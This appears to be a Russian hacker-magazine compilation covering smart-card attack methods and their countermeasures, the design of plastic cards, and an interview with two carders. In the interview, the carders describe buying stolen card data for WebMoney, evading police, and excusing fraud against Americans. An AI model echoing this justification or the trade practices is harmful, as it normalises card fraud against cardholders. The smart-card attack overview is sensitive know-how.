Арсенал средств защиты смарт-карт на сегодняшний день весьма разнообразен. Разрушающим методам вскрытия могут противостоять емкостные датчики или оптические сенсоры под светонепроницаемой оболочкой (что крякеры давно научились обходить). Либо "специальный клей" - покрытие для чипов, которое не только непрозрачно и обладает проводимостью, но также надежно противостоит попыткам уничтожить его, обычно разрушая кремниевый слой, находящийся под ним. Такие покрытия относятся к федеральному стандарту США FIPS 140-1 и широко используются в американской военной промышленности, но повсеместно распространенными в быту их назвать нельзя.
Ряд недорогих и эффективных методов противодействия "дифференциальному анализу питания (ДАП)" и "дифференциальному анализу искажений (ДАИ)" известен по разработкам Cryptography Research. В частности, созданы особые аппаратные и программные методы, обеспечивающие значительно меньший уровень утечек компрометирующей информации, внесение шума в измерения, декоррелирование (разделение взаимозависимостей) внутренних переменных и секретных параметров, а также декоррелирование по времени криптографических операций.
Значительный ряд новых методов защиты предложен компьютерными лабораториями Лувена и Кембриджа (www.dice.ucl.ac.be/crypto, www.cl.cam.ac.uk/Research/Security/tamper/). Суть одного из них, например, заключается в замене традиционных электронных схем самосинхронизирующейся "двухрельсовой" (dual-rail) схемой, где логические 1 и 0 не кодируются, как обычно, импульсами высокого (H) и низкого (L) напряжения в единственном проводнике, а представляются парой импульсов (HL или LH) в двух проводниках. В этом случае появление "нештатной" пары импульсов вида (HH) сразу становится сигналом тревоги, приводящим, как правило, к перезагрузке процессора.
Одно дело читать обо всех этих методах на бумаге и совсем другое - увидеть, как это работает реально. По свидетельству специалистов, открывающаяся картина действительно впечатляет. И стимулирует, конечно же, на поиск новых мер противодействия с еще большим рвением.
Устройство смарт-карты
Типичная смарт-карта - это 8-битный микропроцессор, постоянное запоминающее устройство (ROM), оперативная память (RAM), электрически перепрограммируемая память (EEPROM или FLASH, где, в частности, хранится криптографический ключевой материал), последовательные вход и выход. Все это хозяйство размещается в одном чипе, заключенном в корпус - обычно пластиковую карту размером с кредитку.
Смарт-карты по своим потенциальным возможностям имеют целый ряд важных преимуществ по сравнению с другими технологиями. Обладая собственным процессором и памятью, они могут участвовать в криптографических протоколах обмена информацией, и, в отличие от карточек с магнитной полоской, здесь хранимые данные можно защищать от неавторизованного доступа. Беда лишь в том, что реальная стойкость этой защиты зачастую переоценивается.
Далее будет представлен краткий обзор наиболее важных технологий, используемых при вскрытии смарт-карт. Эта информация важна для любого человека, желающего получить реальное представление о том, как происходит вскрытие защищенных устройств, и каких затрат это стоит. Естественно, тщательное изучение применяемых методов вскрытия позволяет вырабатывать адекватные контрмеры и создавать намного более эффективную защиту смарт-карт.
Все технологии микрозондирования по сути своей являются разрушающими атаками. Это значит, что для их реализации требуются многие часы, иногда недели работы в условиях специализированной лаборатории, а сам исследуемый чип при этом разрушается. Остальные три категории относятся к неразрушающим атакам. Иначе говоря, после того, как злоумышленник подготовил такую атаку в отношении конкретного типа процессора и уже известной версии программного обеспечения, он может с легкостью воспроизвести ее в отношении любой другой карты того же типа. При этом атакуемая карта физически не повреждается, а оборудование, использованное для атаки, обычно можно замаскировать под обычный ридер (считыватель смарт-карт).
Очевидно, что неразрушающие атаки особо опасны, поскольку не оставляют за собой следов. Но понятно и то, что сама природа атак такого рода подразумевает детальное знание процессора и программного обеспечения конкретной карты. С другой стороны, для разрушающих атак микрозондированием требуется очень мало исходных знаний о конкретной конструкции.
Таким образом, атака на новую смарт-карту обычно начинается с разрушающей обратной инженерной разработки, результаты которой помогают создать более дешевые и быстрые неразрушающие атаки. В частности, именно такая последовательность событий многократно отмечена при вскрытии карт условного доступа в системах платного телевидения.
К этому типу атак относят те, которые сопровождаются вскрытием корпуса устройства. Публичное представление таких методов, применяемых в крякерском подполье, впервые было сделано в 1996 году исследователями из Кембриджского университета Россом Андерсоном и Маркусом Куном в ходе второго семинара USENIX по электронной коммерции (Росс Андерсон, Маркус Кун "Стойкость к вскрытию. Предупреждение", www.cl.cam.ac.uk/~mgk25/tamper.html). Более подробно эти технологии описаны в совместной статье Куна и Оливера Кеммерлинга 1999 года "Принципы конструирования защищенных процессоров смарт-карт" (www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf), а также в последующей докторской диссертации Куна, которая, правда, в интернете не опубликована.
В начале 1990-х годов в Кавендишской лаборатории Кембриджа была создана технология обратного восстановления схемы сложных кремниевых чипов, позволяющая аккуратно снимать слои микросхемы один за другим. Одно из примененных здесь новшеств - техника показа примесных N и Р слоев на основе эффекта Шоттки: тонкая пленка из золота или палладия накладывается на чип, образуя диод, который может быть виден в электронном луче. Изображения последовательных слоев чипа вводятся в компьютер, специальное программное обеспечение очищает первоначально нечеткие образы, выдает их ясное представление и распознает стандартные элементы чипа. Эта система была протестирована на процессоре Intel 80386 и ряде других устройств. Работа над восстановлением 80386 заняла две недели, причем для правильной реконструкции обычно требуется около шести образцов чипа. Результатом работ могут быть диаграммы масок и схем или даже список библиотечных ячеек, из которых чип был сконструирован.
В условиях, когда конструкция и принципы функционирования чипа уже известны, существует очень мощная технология, разработанная в IВМ для исследования чипа в работе даже без удаления защитного слоя. Для измерения рабочих характеристик устройства над ним помещают кристалл ниобата лития. Показатель преломления этой субстанции изменяется при изменении электрического поля, и потенциал находящегося под ней кремния может считываться с помощью ультрафиолетового лазерного луча, проходящего через кристалл под скользящим углом наклона. Возможности этой технологии таковы, что можно считывать сигнал в 5 В с частотой до 25 МГц. По сути, это стандартный путь для хорошо оснащенных лабораторий при восстановлении криптоключей в чипах, конструкция которых известна.
Чаще всего критика в адрес дифференциального анализа искажений (особенно со стороны выпускающих смарт-карты фирм) сводилась к тому, что вся эта методика носит сугубо теоретический характер. Ведь никто не продемонстрировал на практике, что сбойные ошибки можно вызывать именно в криптосхеме, причем конкретно в алгоритме разворачивания ключа.
Но уже весной 1997 года появилось описание не теоретической, а весьма практичной атаки, получившей название "усовершенствованный метод ДАИ". Авторы атаки (кембриджский профессор Росс Андерсон и его аспирант из Германии Маркус Кун) продемонстрировали, что могут извлекать ключ из смарт-карты менее чем по 10 блокам шифртекста. В основу нового метода была положена модель принудительных искажений или "глич-атак" (от английского glitch - всплеск, выброс), реально практикуемых крякерами при вскрытии смарт-карт платного телевидения.
Под глич-атаками понимаются манипуляции с тактовой частотой или напряжением питания смарт-карт, что позволяет выдавать дампы с ключевым материалом на порт выхода устройства. Эффективность глич-атак продемонстрирована кембриджскими авторами как на симметричных криптосхемах, так и на вскрытии алгоритмов с открытым ключом. Ссылки на соответствующие статьи дыбай на сайте Росса Андерсона - www.cl.cam.ac.uk/users/rja14/#Reliability.
В традиционном анализе криптоустройств и защищенных протоколов принято предполагать, что входное и выходное сообщения доступны злоумышленнику, а какая-либо информация о ключах ему неизвестна. Однако любое электронное устройство состоит из конкретных элементов, выдающих в окружающую среду информацию о своей работе. А значит, на самом деле, атакующей стороне может быть доступна и всевозможная побочная информация, выдаваемая криптоустройством: электромагнитное излучение, сигналы об ошибках или об интервалах времени между выполняемыми инструкциями, колебания в потреблении электропитания и другие данные. Вообще, все это очень хорошо известно военным и спецслужбам, где разработаны специальные методы работы с побочными каналами утечки информации, но тема эта (под кодовым наименованием Tempest) строго засекречена и открытых публикаций о ней очень мало.
Этими же специалистами из Кембриджа совместно с учеными компьютерной лаборатории Лувенского университета (Бельгия) недавно разработаны еще несколько новых методов считывания информации из защищенных чипов смарт-карт (David Samyde, Sergei Skorobogatov, Ross Anderson, Jean-Jacques Quisquater: On a New Way to Read Data from Memory - www.ftp.cl.cam.ac.uk/ftp/users/rja14/SISW02.pdf). Общим для данных методов является то, что они индуцируют поддающиеся замерам изменения в аналоговых характеристиках ячеек памяти.
Например, сканируя ячейки сфокусированным лазером или наводя в них вихревые токи с помощью индуктивной спирали на игле микропробника, можно повысить электромагнитные утечки, выдающие записанное там значение бита, но при этом само это значение сохраняется в ячейке ненарушенным. Сильным охлаждением чипа в нужный момент времени можно "заморозить" содержимое интересующего регистра и считать из него (ключевую) информацию, обычно хранящуюся или передаваемую в зашифрованном виде. Эта технология применима к самым разным типам памяти от RAM до FLASH и реально продемонстрирована считыванием ключей DES из ячеек RAM без какого-либо физического контакта с чипом.
Эта работа проведена учеными по заказу проекта Евросоюза G3Card и ставит перед собой цель создания смарт-карт следующего поколения, способных максимально противостоять современным атакам, вплоть до "полуразрушающих". Создание абсолютной защиты, естественно, не является реалистичным для устройств, применяемых в действительности, одно из главных достоинств которых - дешевизна.
Разработкой мер защиты смарт-карт от вскрытия, конечно же, занимаются не только в университетах или маленьких фирмах, вроде Cryptography Research Пола Кочера или Advanced Digital Security Research Оливера Кеммерлинга. Большая работа ведется и непосредственно в смарт-карточной индустрии, где, правда, предпочитают в подробностях не распространяться на эту тему. Но иногда кое-какая информация все же просачивается.
Так, в прошлом году на криптографической выставке-конференции RSA-2002 интереснейшая экспозиция была устроена компанией Datacard Group (www.datacard.com), специализирующейся на разработке смарт-карт. На своем выставочном стенде сотрудники фирмы развернули некий "полевой вариант" небольшой электронной лаборатории. Буквально на глазах изумленной публики демонстрировалось вскрытие смарт-карт с помощью описанных выше методов ДАП и ДАИ. Оборудования для этих работ требовалось совсем немного - осциллограф, компьютер да несколько "специальных коробочек".
Для зрителей процесс вскрытия смарт-карты выглядел примерно так: "Сейчас вы видите на экране осциллографа последовательность вертикальных всплесков. Это циклы DES-алгоритма, шифрующего информацию в чипе карты. Давайте увеличим разрешение картинки. Внутри цикла вы видите пики характерной формы - это S-боксы, преобразующие нужный нам ключ. Давайте запустим программу вскрытия, которая по особенностям этих сигналов отыскивает биты секретной информации, и вот через минуту или две мы получаем ключ на выходе программы".
Тройной DES вскрывался аналогично, но примерно раза в 3 раза дольше. Те же самые несколько минут уходили у аналитиков Datacard на отыскание пары больших простых чисел, образующих ключ в алгоритме RSA. Для этого не использовались, ясное дело, ужасно трудоемкие методы факторизации, а "просто" внимательно анализировались реакции чипа смарт-карты на небольшие варьирования в напряжении и частоте при подаче питания...
Практически все типы смарт-карточных чипов в европейских, а затем в американских и азиатских системах платного телевидения были успешно вскрыты крякерами при помощи методов обратной инженерной разработки.
Общение с кардером
Блуждая как-то ночью по просторам Сети, я случайно наткнулся на сайт, целиком посвященный кардингу - www.cardingworld.com. Набравшись смелости, я завязал беседу с владельцами ресурса. Знакомьтесь - David и Graf.
Бытует мнение, что все кардеры - замкнутые звероподобные и скрытные существа, которых не то что разговорить, трудно просто отловить живьем. На самом деле они - самые обычные люди, а быть скрытными их вынуждает хобби, которое подпадает под определенные статьи УК. Но не все занимаются кардингом на практике (знают только в теории), либо переросли свое увлечение и давно отошли от дел. Кто-то вспоминает с ностальгией, кто-то создает свои ресурсы, а кто-то на этих ресурсах еще и зарабатывает, основав для собратьев плацдарм, помогающий оперативно обмениваться нужной информацией.
XS: Для начала расскажите немного о себе. Имя, возраст, где обитаете?
David: Зовут меня Серега, 19 лет от роду, живу в Минске.
Graf: А меня величают Костя, 21 год уже пошел, живу в далекой Кемеровской области, что в славном государстве Россия.
XS: Как прошло ваше детство? С кровати не падали?
David: Детство прошло отлично, хотя с компьютерами оно связано не было.
Graf: Да нормально, не жалуюсь, всякое в жизни бывает - и плохое, и хорошее.
XS: В каком году появился первый комп? Чем увлекались?
David: Первый компьютер под странным названием "ВЕКТОР" появился приблизительно в 1990 году. Первое время, как и большинство пользователей ПК, играл в разные игрушки. Позже стал интересоваться всем остальным.
XS: А как обстоят дела с образованием? Где в данный момент грызете гранит?
David: В данный момент заканчиваю учиться в негосударственном техникуме. Специальность в чем-то связана с кардингом, хотя на момент поступления я еще не увлекался этим направлением.
Graf: Я окончил школу и колледж, сейчас учусь в университете, на полпути к диплому.
XS: Что такое кардинг? Ваше мнение?
Graf: Кардинг - это способ завладеть чужими деньгами или приобретение какого-либо товара с помощью ворованных кредитных карточек.
XS: Когда и почему стали увлекаться кардингом?
David: Стал увлекаться кардингом чуть больше года назад. Ну, в принципе, занятие кардингом меня сильно затянуло, да и неплохой денежный доход приносит.
Graf: Занимаюсь кардингом уже 2 года, так как вижу в этом реальный способ заработать хорошие деньги, плюс огромный интерес.
XS: Сколько времени вам понадобилось, чтобы, встав однажды утром, гордо сказать: "Я - кардер"?
David: Чтобы понять, что я действительно кардер, мне понадобилось около года усиленной работы в этом направлении.
Graf: Полгодика.
XS: Как продвигались? Что читали по ночам?
David: Все началось со сбора полезной инфы из Сети и чтения подобных статей, что и помогло мне в этом разобраться.
Graf: Со мной произошла отдельная история. Я спокойно шел по улице и вдруг заметил кредитную карту с чипом. Я очень заинтересовался, есть ли там деньги, а также как их можно снять. Недолго думая, я обратился за помощью к интернету. Сначала я искал, как взломать чип, потом постепенно узнал, что такое креды. Ну, а там, естественно, как их можно обналичить. И пошло-поехало.
XS: Что сейчас происходит на сцене? Кого считаете своими кумирами в мире кардинга?
Graf: Сцена живет, кардеры - это как чума, от которой еще не придумана вакцина. Мы были, есть и будем до тех пор, пока существует Сеть. Каждый кардер по-своему уникален, так что называть отдельно никого не буду.
David: Есть для меня несколько авторитетов в мире кардинга, но я бы не хотел говорить о них "в прямом эфире".
XS: Как возникла идея создать сайт?
David: Идея создать сайт пришла Graf’у, а я взял на себя ответственность за его разработку.
Graf: Я познакомился с David'ом, мы нашли общий язык, стали часто общаться, потом у меня появилась идея создать свой проект, он поддержал меня в этом начинании, после чего и появился сам сайт. Все просто, как сама жизнь.
XS: Какую функцию выполняет форум на сайте?
Graf: Помогает нашим мемберам в той или иной сфере кардинга, на нашем форуме всегда можно дать объявление, найти что-либо необходимое для себя, проконсультироваться и почерпнуть кучу полезной информации.
David: От себя хочу также добавить, что форум помогает общаться новичкам и продвинутым кардерам, обмениваться опытом, получать ответы на различные вопросы и т.п.
XS: Какими способами лично вы достаете креды? Какой из способов считаете самым оптимальным и безопасным?
David: Как? Я лично не хакер, чтобы ломать направо и налево интернет-магазины, поэтому покупаю картон у знакомых.
Graf: Я беру кредитки у друзей. Считаю это самым безопасным способом, а так креды добываются в основном взломом различных порносайтов, онлайн-шопов и прочих организаций, принимающих к оплате кредитные карты.
XS: Как происходит торговля кредитными карточками?
David: Креды (картон) можно купить у известных людей оптом, что будет намного дешевле, чем в розницу. Картон продают в основном за WebMoney или за E-Gold. Схема такова: ты отправляешь определенную сумму на кошелек продавцу, а тебе взамен присылают по аське или по e-mail'у картон. IMHO, нет ничего проще!
XS: Какие методы используют онлайн-шопы для борьбы с "ужасными" кардерами?
Graf: Методов борьбы очень много, но нам они уже давно известны и хорошо проработаны. Сначала были простые кредитки, сейчас ввели защитный код cvv2 и cvc. Хотя найти сайты с использованием простых кред тоже еще реально. Есть случаи, когда требуется голосовое подтверждение. Часто требуется выслать сканы паспорта, прав или кредитной карты. Но мы не спим и постоянно придумываем методы противодействия различным защитам.
XS: Совесть не мучает?
David: А почему меня совесть должна мучить? Я же не своих граблю, а в основном жадных буржуев или богатых магнатов. Я же не забираю последние деньги у нищего.
Graf: Нет, не мучает. А за что? За то, что я беру немного денег у зажравшейся нации, таких, как Амеры? Страна, где 60% населения страдают ожирением, которые вечно лезут, куда их не просят, что-то диктуют, указывают, в каждой жопе затычка? Один старый кардер сказал умную фразу: "Мы сделаем Штаты немного беднее, а Россию и СНГ немного богаче".
XS: Ваша позиция ясна. А знаете такой отдел "К"?
David: Конечно. Знаем и про отдел "Р", и про отдел "К". Вот и используем любые средства, чтобы обезопасить себя от них. Практически все кардеры используют анонимные прокси, VPN и прочие фишки.
Graf: Знаю. Попасть к ним в лапы, конечно, не хотелось бы, но, как говорится, волков бояться - в лес не ходить.
XS: Какая ось установлена у вас на ПК, какую считаете самой безопасной?
David: В данный момент установлен Windows 2000 Pro. Не использую Linux, так как привык к окошкам.
Graf: До появления XP использовал 98, а теперь всерьез подсел на XP. А безопасность в микрософте - понятие относительное.
XS: У кардера какой-то особый софт на тачке или как у всех?
David: На моем писюке прижились Miranda, WinRar, FlashGet, RusmIRC, SocksCap, CuteFTP Pro, Internet Explorer, Webmoney, WinAmp и прочие софтинки. А помимо этого использую множество самописного софта, перечислять нет смысла - все noname.
Graf: Не буду оригинален: IE, OutLook, ICQ, WinAmp, OutPost...
XS: На чем программируете?
David: PHP, ASP и C++.
XS: А чем занимаетесь в свободное от кардинга время?
David: В свободное время пытаюсь находиться на расстоянии от компьютера. Отдыхаю как все обычные люди.
Graf: Учусь, тусуюсь в клубах, отдыхаю всячески и по-разному.
XS: Что кардеры слушают?
David: В основном Круг. Обожаю русский шансон, но могу на время запасть и на классные диджейские миксы.
Graf: Особых кумиров у меня нет, но люблю послушать Linda, Enigma, Prodigy, In-Grid, Глюкоза и ВИАГРА.
XS: Что читают? Любимый автор?
David: Пока не хватает времени на книги, учусь усиленно.
Graf: Сейчас ничего не читаю, только прессу. Любимый автор - Достоевский.
XS: Смотрите ТВ?
David: Естественно смотрю, в основном спорт. Иногда новости.
Graf: Конечно. Люблю хорошие фильмы и свежие новости.
XS: И напоследок пару слов нашим читателям, желающим встать на путь кардинга.
David: Прежде чем примешь решение выйти на "большую дорогу", подумай над этим 101 раз.
Пластиковые карты на все случаи жизни
Вот уже несколько десятилетий пластиковые карты широко используются в повседневной жизни. Появившись задолго до распространения персональных компьютеров и сотовых телефонов, они заменяют бумажные купюры, пропуска и удостоверения.
Но очевидные преимущества скрывают за собой менее очевидные недостатки. Если для того, чтобы лишить тебя наличности, мошеннику необходимо вытащить кошелек у тебя из сумки или кармана, то для воровства с помощью пластиковых карт он может находиться в соседней комнате, а может и на другом континенте.
Проблема identity theft (дословно - воровство идентификационных данных) стала в последнее время одной из самых обсуждаемых тем. Хотя под этим термином понимают и подделку чеков, и кражу паролей, а по мере распространения альтернативных механизмов аутентификации (в частности, биометрия) приходится учитывать все новые и новые возможности для злоупотреблений личной информацией, в центре внимания находятся именно пластиковые карты.
Они есть и у студентов, и у бизнесменов, и у домохозяек - дебетные и кредитные, для проезда на общественном транспорте, оплаты телефонных переговоров, доступа в интернет и т.п. Дошло до того, что пластиковые телефонные карты стали объектом коллекционирования - на любом онлайн-аукционе можно найти раздел, посвященный этой "филателии XXI века". Даже в поликлиниках вместо бумажного страхового полиса теперь выдают пластиковые карты!
По методу хранения информации весь этот "пластик" можно разделить на три основных категории: карты с магнитной полосой, скретч-карты и смарт-карты. В отдельную группу выделяют пластиковые визитные карточки и прочую сувенирную продукцию, виды правонарушений с их использованием якобы неизвестны. Хотя в метро я несколько раз проходил мимо свирепых старушек, показывая им пластиковый календарик, причем прошлогодний.
Карты с магнитной полосой
Первое, что приходит в голову, когда слышишь термин "пластиковая карта" - это классические карты с магнитной полосой. Появились они еще в 50-х годах прошлого века. Пионером в использовании новой технологии стала компания Diners Club, а затем к ней присоединилась и American Express. За это время карты распространились по всему миру, на них же и приходится самый большой процент противоправных действий или, попросту говоря, случаев мошенничества и воровства.
Согласно стандарту ISO-7810, пластиковая карта представляет собой прямоугольную пластину размером 85,6х54 мм и толщиной 0,76 мм. Для защиты этого миниатюрного кусочка пластмассы используются последние технологии в самых разных областях: полиграфии, химической промышленности, разработке программного обеспечения и т.п.
Обычно карта несет на себе следующую информацию:
На лицевой стороне:
уникальный 16-значный номер;
срок действия (от и до);
имя владельца.
На тыльной стороне:
магнитная полоса;
подпись владельца.
Кроме того, полиграфическим способом на карту может наноситься множество изображений: фотография владельца, справочная информация для клиентов банка и т.п.
Буквы и цифры на лицевой стороне могут быть выбиты специальным эмбоссером, а могут быть и просто напечатаны, к примеру, как на картах Visa Electron.
Основным хранилищем данных на карте является магнитная полоса. По своим свойствам она похожа на пленку, которая используется в аудиокассетах. Информация может записываться на три дорожки, отличающиеся форматом:
первая имеет плотность записи 210 бит на дюйм (BPI) и может содержать 79 7-битных (6 бит + четность) алфавитно-цифровых символов (доступны только для чтения);
вторая - 75 BPI, содержит 40 5-битных (4 бита + четность) цифр;
третья - 210 BPI, содержит 107 5-битных (4 бита + четность) цифр.
На банковских картах на дорожки записываются: номер счета, код валюты, код страны выдачи, имя владельца, срок действия (в принципе, та же информация, что напечатана на самой карте, но в цифровом виде). Кроме того, любая компания может использовать собственный формат данных. Например, для использования в качестве внутреннего пропуска там вместо номера счета может быть указан уровень полномочий владельца и т.п.
Каждый раз для проведения денежных транзакций с помощью банковских карт системой инициируется процесс аутентификации - проверяется правильность записанной на карте информации. Аутентификация бывает следующих видов:
В любом случае, на одной стороне находится владелец карты, а на другой - специализированная организация (aquirer), которая устанавливает связь с банком, выдавшим карту, для проверки данных:
Если все необходимые условия выполнены, а запрошенная сумма не превышает остаток на счете, эта же организация обеспечивает гарантии перевода денег другому участнику транзакции.
Передача данных между терминалом и проверяющей организацией происходит по телефонным сетям или по интернет-каналам. Для защиты передаваемых данных используется шифрование. К примеру, банкомат шифрует введенный PIN-код и отправляет его для сверки с тем, что хранится в базе данных банка, выдавшего карту. Для шифрования используется криптографический метод односторонних функций. Их значение легко вычислить в одном направлении с использованием банковского ключа и набранного PIN-кода, а проведение обратного преобразования (инвертирования) на практике очень неэффективно, даже если банковский ключ стал известен. Эта защита была введена, чтобы защитить держателя карты от действий нехорошего дяди, получившего доступ к банковским базам.
Кроме технических средств, большое значение имеют организационные и административные методы защиты. Они включают в себя целый комплекс мер на самых разных уровнях: от специальных замков на кабинах банкоматов и call-центров экстренной помощи, куда следует обращаться в случае утери или кражи карточки, до правительственного контроля над продажей оборудования для производства самих карт.
Казалось бы, в процессе оплаты по пластиковой карте все настолько предусмотрено, а каждая операция проходит столько различных проверок, что проще, наверное, было бы внедриться в зарубежную разведку, чем украсть деньги со счета. И хотя статистику выявления шпионов от нас скрывают, судя по доступной информации о случаях мошенничества, все оказывается далеко не так радужно, как хотелось бы. При удачных атаках добычей хакеров становится информация о миллионах банковских карт. И такие случаи происходят достаточно часто, чтобы заставить беспокоиться каждого, кто хранит свои деньги "на карточке".
Но проблемы, с которыми сталкиваются люди при использовании пластиковых карт с магнитной лентой, не ограничиваются лишь противоправными действиями. Как и любая другая технология полувековой давности, они имеют ряд редостатков. К примеру, массу неудобств приносит тот факт, что любой магнит может элементарно стереть всю хранящуюся информацию, и даже простые царапины могут повлиять на ее целостность. И это еще не самое страшное, по сравнению с другими "родовыми травмами".
Смарт-карты
Технология смарт-карт, призванная исправить эти недостатки, существует довольно давно. Впервые ими начали пользоваться французы в 1984 году. Но до сих пор они не получили повсеместного распространения. Хотя и были планы, согласно которым к 2004 году все платежные системы собирались перейти на использование смарт-карт, банки все продолжают выпускать старый добрый "пластик".
Снаружи карты обоих типов (магнитные и смарт-карты) выглядят почти одинаково, но зато внутри... Начну с того, что у обычных карт никакого "внутри" вообще нет, а у смарт-карт там под позолоченными контактами спрятан микрочип. Он может содержать до килобайта RAM, 24 Кб ROM и 16 Кб перепрограммируемого ROM. В нем есть еще и 8-битный микропроцессор, работающий на частоте около 5 МГц. И все это в упаковке тоньше миллиметра! Понятное дело, что с таким богатством магнитная полоса отпадает за ненадобностью.
Вычислительные возможности процессора позволяют перейти от обычной аутентификации к полноценному применению криптографии. И хотя для пользователя, снимающего деньги, процедура выглядит привычно (ввел PIN-код и готово), внутри системы работает сложный механизм обмена зашифрованными данными.
Для того чтобы обеспечить максимальную защиту этих алгоритмов, на каждом этапе жизненного цикла смарт-карт закладывается свой "секрет". Таким образом, даже если злоумышленники внедрятся непосредственно в технологический процесс, сами карты не будут скомпрометированы.
Процессор внутри каждой карты работает под управлением операционной системы, предоставляющей достаточно удобный интерфейс для разработчика. Именно благодаря этой системе и возможно выполнение программ, запись и чтение файлов, шифрование и проверка криптографических данных. Гибкость ее настолько велика, что корпорация Sun даже разработала платформу Java Card, позволяющую использовать для разработки специализированных приложений свою сверхпопулярную технологию Java.
Существенно увеличенная (по сравнению с магнитной картой) емкость носителя и удобный доступ к хранящимся данным позволяют использовать одну карточку для нескольких типов операций. К примеру, в качестве пропуска, для получения зарплаты и доступа в компьютерную сеть компании. Таким образом ты избавляешься от тугой стопки карт в кошельке, получая вместо них одну универсальную.
Что же мешает внедрению этой замечательной технологии на практике? Как ни банально, все опять упирается в деньги. И дело здесь не только и не столько в разнице стоимости готовых карт. Все дело, прежде всего, в огромной инфраструктуре, обширной сети банкоматов, POS-терминалов и прочей техники, охватившей всю планету. Замена и модификация оборудования, разработка и внедрение программного обеспечения, обучение персонала - трудно даже представить, во сколько все это обойдется.
Из-за этих сложностей смарт-карты пока внедряются на более узких рынках. Например, многие современные компьютеры, особенно предназначенные для корпоративных заказчиков, имеют встроенные устройства для их чтения. Так как большинство операционных систем поддерживают авторизацию пользователей с помощью аппаратных средств, это позволяет существенно повысить безопасность в компьютерной сети компании. Теперь нерадивые пользователи не будут приклеивать бумажку с паролем на монитор или класть ее под клавиатуру. Будет достаточно вставить свою персональную (без пошлостей) карту в слот и готово.
В новостях регулярно появляются сообщения о том, что правительства разных стран планируют использовать возможности смарт-карт для создания паспортов нового поколения, размещая в памяти целую картотеку данных по каждому гражданину: биометрическую информацию, медицинскую и страховую истории, ключи персональной "электронной подписи" и т.п.
Скретч-карты
Мошенничество с предоплаченными, или скретч-картами, наиболее распространено. Действительно, несерьезно было бы тратить время и деньги на разработку каких-то хитрых технологий для считывания информации под защитным слоем. К тому же прибыли здесь несравнимо меньше и ограничены. Гораздо интереснее закупить оборудование и организовать производство большой партии "двойников", максимально похожих на карты популярных платежных систем, телекоммуникационных компаний и т.п.
Из-за специфики скретч-карт, их графическому оформлению уделяется особое внимание. Обычно отличия "двойников" от оригинала проявляются именно в деталях, когда не удается повторить более сложный технологический процесс или миниатюрные элементы рисунка. Так, в известном инциденте с распространением поддельных карт "БИ+" опознать их можно было по более широким линиям штрих-кода и способу его нанесения (не над защитным слоем ламината, а под ним). Еще одним различием (более заметным) был повторяющийся серийный номер.
В простейшем случае номера генерируются случайно. Если же преступникам каким-либо образом удастся заполучить базы данных действительных номеров и PIN-кодов, а потом выбросить на рынок подобные подделки… Примерно такие кошмары снятся руководителям служб безопасности крупных интернет-провайдеров и компаний-операторов сотовой связи.
Именно поэтому многие крупные фирмы предпочитают взять выпуск "пластика" в свои руки. Для этого они закупают оборудование на сотни тысяч долларов, обучают персонал и налаживают собственное производство. Впрочем, зачастую бывает достаточно закупать готовые карты у специализированных компаний, а потом на собственных мощностях наносить на них номера и защитный слой.
Что дальше
Три описанные категории не охватывают все разнообразие карт. Для пропусков и страховых полисов, к примеру, часто используются лишь штрих-коды, а в дисконтных и клубных системах карты могут вообще не нести никакой информации, кроме уникального номера и ФИО. В большинстве случаев повысить относительно невысокий уровень защиты позволяет нанесение фотографии владельца (и на проходной, и в магазине достоверность дополнительно проверяется человеком). А защитить карту от подделки помогает сложная полиграфия, например, нанесение голографического рисунка.
В общем, технологий очень много, а завтра будет еще больше. Хорошо ли это? Да просто замечательно! Но верно сказал классик: воруют...
Номер карты
Номер карты является первичным источником информации о ней: по нему можно узнать тип карты, банк-эмитент, а также номер счета. Структура может различаться (так, существуют карты Visa с 13 и 16-значными номерами), но по первой цифре всегда можно определить, какой системе она принадлежит:
3 – American Express, Diners Club и некоторые другие системы
4 – Visa
5 – MasterCard
6 – DiscoverCard
Жизнь карты
Первый этап: производство компонентов
После сборки в чип закладывается специальный ключ (fabrication key, KF). Он не позволяет внести в него изменения до непосредственного запечатывания в пластик. KF создается с помощью специальных алгоритмов и с использованием мастер-ключа изготовителя, уникален для каждой выпускаемой карты.
Второй этап: перед персонализацей карты
Готовый чип поставляется компании, выпускающей чистые смарт-карты. На месте он устанавливается на пластиковую основу и тестируется. FK заменяется ключом персонализации (personalisation key, KP). Для дополнительной безопасности на KP устанавливается блок Vper (personalisation lock). Физический доступ к памяти полностью закрывается, а для записи и изменения информации используется только программный метод. После этого системные области, на которых содержатся заложенные ключи, недоступны для чтения и записи.
Третий этап: персонализация карты
Этот этап выполняется компанией-эмитентом (например, банком). В память записывается специальное программное обеспечение, формируются файлы данных, содержащие информацию о владельце карты, PIN-коде и т.д. В конце данные закрываются блоком Vutil (utilisation lock). После этого карта может выдаваться ее новому владельцу.
Четвертый этап: использование карты
В процессе использования активируются программы, они обращаются к логической файловой системе, запускают механизмы шифрования и т.п. Доступ к данным определяется заложенной политикой безопасности.
Пятый этап: истечение срока действия
Переход к заключительному этапу может быть инициирован двумя способами. Первый выполняется программой, которая записывает последний блок (invalidation lock) на мастер-файл. После этого любые операции записи становятся недоступны, но операции чтения могут быть проведены, например, для анализа хранящейся информации. Другой способ заключается в установке блока на PIN-код и дополнительный разблокирующий PIN-код. В этом случае становятся невозможны все операции, даже чтение.
Многие из нас могут даже не догадываться, что являются пользователями смарт-карт. К примеру, SIM-карта твоего сотового телефона являются той самой "умной картой", но без "лишнего" пластика.
Они есть и у студентов, и у бизнесменов, и у домохозяек - дебетные и кредитные, для проезда на общественном транспорте, оплаты телефонных переговоров, доступа в интернет и т.п.
Согласно стандарту ISO-7810, пластиковая карта представляет собой прямоугольную пластину размером 85,6х54 мм и толщиной 0,76 мм.
На банковских картах на дорожки записываются: номер счета, код валюты, код страны выдачи, имя владельца, срок действия (в принципе, та же информация, что напечатана на самой карте, но в цифровом виде).
Для шифрования используется криптографический метод односторонних функций. Их значение легко вычислить в одном направлении с использованием банковского ключа и набранного PIN-кода.
И хотя для пользователя, снимающего деньги, процедура выглядит привычно (ввел PIN-код и готово), внутри системы работает сложный механизм обмена зашифрованными данными.
Теперь нерадивые пользователи не будут приклеивать бумажку с паролем на монитор или класть ее под клавиатуру. Будет достаточно вставить свою персональную (без пошлостей) карту в слот и готово.
Для пропусков и страховых полисов, к примеру, часто используются лишь штрих-коды, а в дисконтных и клубных системах карты могут вообще не нести никакой информации, кроме уникального номера и ФИО.
Практические советы юному кардеру
Хорошо быть богатым. Покупать крутые тачки, водить девочек в рестораны, а на выходные мотаться куда-нибудь на Кипр. В основном поэтому люди и начинают заниматься кардингом - хочется быстрых денег, хочется на Кипр.
